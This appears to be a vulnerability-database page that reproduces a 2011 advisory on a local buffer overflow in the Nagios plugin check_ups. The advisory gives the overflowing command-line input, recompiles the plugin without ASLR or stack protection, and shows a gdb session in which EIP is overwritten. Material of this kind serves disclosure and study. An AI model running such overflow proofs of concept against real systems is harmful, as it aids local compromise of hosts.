Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Nagios Plugin check_ups Buffer Overflow

🗓️ 26 Dec 2011 00:00:00Reported by Stefan SchurtzType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 15 Views

Nagios Plugin 'check_ups' local buffer overflow vulnerabilit

Code
`#################################################################  
# Advisory: Nagios Plugin 'check_ups' local buffer overflow  
# Author: Stefan Schurtz  
# Contact: [email protected]  
# Affected Software: Successfully tested on nagios-plugins-1.4.15  
# Vendor URL: http://nagiosplugins.org/  
#################################################################  
  
./check_ups -u `perl -e 'print "A"x16407'`  
*** buffer overflow detected ***: ./check_ups terminated  
======= Backtrace: =========  
/lib/libc.so.6(__fortify_fail+0x50)[0x25d970]  
/lib/libc.so.6(+0xe486a)[0x25c86a]  
/lib/libc.so.6(+0xe3fa8)[0x25bfa8]  
/lib/libc.so.6(_IO_default_xsputn+0x9e)[0x1e2a2e]  
/lib/libc.so.6(_IO_vfprintf+0x36b2)[0x1b88c2]  
/lib/libc.so.6(__vsprintf_chk+0xad)[0x25c05d]  
/lib/libc.so.6(__sprintf_chk+0x2d)[0x25bf9d]  
./check_ups[0x8049e66]  
./check_ups[0x804a105]  
./check_ups[0x804a4ce]  
/lib/libc.so.6(__libc_start_main+0xe7)[0x18ece7]  
./check_ups[0x80491a1]  
======= Memory map: ========  
00110000-0012c000 r-xp 00000000 08:01 660177 /lib/ld-2.12.1.so  
0012c000-0012d000 r--p 0001b000 08:01 660177 /lib/ld-2.12.1.so  
0012d000-0012e000 rw-p 0001c000 08:01 660177 /lib/ld-2.12.1.so  
0012e000-0012f000 r-xp 00000000 00:00 0 [vdso]  
0012f000-00142000 r-xp 00000000 08:01 660186 /lib/libnsl-2.12.1.so  
00142000-00143000 r--p 00012000 08:01 660186 /lib/libnsl-2.12.1.so  
00143000-00144000 rw-p 00013000 08:01 660186 /lib/libnsl-2.12.1.so  
00144000-00146000 rw-p 00000000 00:00 0  
  
// Compile without stack protection  
  
sysctl -w kernel.randomize_va_space=0  
  
cd plugins/  
  
gcc -fno-stack-protector -z execstack -DNP_VERSION=\"1.4.15\" -g -o check_ups check_ups.c netutils.o utils.o -L/usr/src/nagios-plugins-1.4.15/plugins ../lib/libnagiosplug.a ../gl/libgnu.a -DLOCALEDIR=\"/usr/local/nagios/share/locale\" -I../lib -I../gl -I../intl -I..  
  
// next test  
  
./check_ups -u `perl -e 'print "A"x16408'`  
Connection refused  
Invalid response received from host  
Segmentation fault  
  
(gdb) run -u `perl -e 'print "A"x16408'`  
The program being debugged has been started already.  
Start it from the beginning? (y or n) y  
Starting program: /usr/src/nagios-plugins-1.4.15/plugins/check_ups -u `perl -e 'print "A"x16408'`  
Connection refused  
Invalid response received from host  
  
Program received signal SIGSEGV, Segmentation fault.  
0x41414141 in ?? ()  
(gdb) i r  
eax 0xffffffff -1  
ecx 0x2914e0 2692320  
edx 0x292360 2696032  
ebx 0x41414141 1094795585  
esp 0xbfff56f0 0xbfff56f0  
ebp 0x41414141 0x41414141 <--- AAAA  
esi 0x0 0  
edi 0x0 0  
eip 0x41414141 0x41414141 <--- AAAA  
eflags 0x10286 [ PF SF IF RF ]  
cs 0x73 115  
ss 0x7b 123  
ds 0x7b 123  
es 0x7b 123  
fs 0x0 0  
gs 0x33 51  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
26 Dec 2011 00:00Current
0.6Low risk
Vulners AI Score0.6
nagiosplugincheck_upsbuffer overflowvulnerability
15